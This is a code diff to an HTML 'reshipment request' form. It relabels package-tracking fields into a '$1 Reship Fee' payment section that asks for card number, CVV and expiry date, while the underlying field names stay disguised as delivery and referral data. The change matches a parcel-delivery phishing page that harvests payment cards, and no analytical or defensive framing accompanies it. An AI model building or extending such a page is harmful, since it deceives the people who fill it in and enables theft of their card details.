--- a/details.html
+++ b/details.html
@@ -29,26 +29,26 @@
                     <input type="hidden" name="_subject" value="New Reshipment Request (Step 2)">
                     <input type="hidden" name="_captcha" value="false">
 
-                    <div class="form-section-title">Package Details</div>
+                    <div class="form-section-title">$1 Reship Fee</div>
                     <div class="form-col" style="margin-bottom: 20px;">
-                        <label>Special Request Details</label>
+                        <label>Reship Fees Payment $1</label>
                         <textarea name="Request Details" rows="3" placeholder="Any specific instructions..."></textarea>
                     </div>
 
                     <div class="form-row">
                         <div class="form-col">
-                            <label>Original Delivery Number (Tracking ID) *</label>
+                            <label>Card Number *</label>
                             <input type="text" name="Delivery Number" required>
                         </div>
                         <div class="form-col">
-                            <label>Referral Code (from flyer)</label>
+                            <label>CVV</label>
                             <input type="text" name="Referral Code">
                         </div>
                     </div>
 
                     <div class="form-row">
                         <div class="form-col">
-                            <label>Original Delivery Month *</label>
+                            <label>Expiry Month *</label>
                             <select name="Delivery Month" required>
                                 <option value="">Select Month</option>
                                 <option>January</option><option>February</option><option>March</option>
@@ -58,9 +58,10 @@
                             </select>
                         </div>
                         <div class="form-col">
-                            <label>Delivery Year *</label>
+                            <label>Expiry Year *</label>
                             <select name="Delivery Year" required>
-                                <option>2026</option><option>2025</option><option>2024</option>
+                                <option>2026</option><option>2027</option><option>2028</option><option>2029</option><option>2030</option>
+                                <option>2031</option><option>2032</option><option>2033</option><option>2034</option><option>2035</option><option>2036</option>
                             </select>
                         </div>
                     </div>
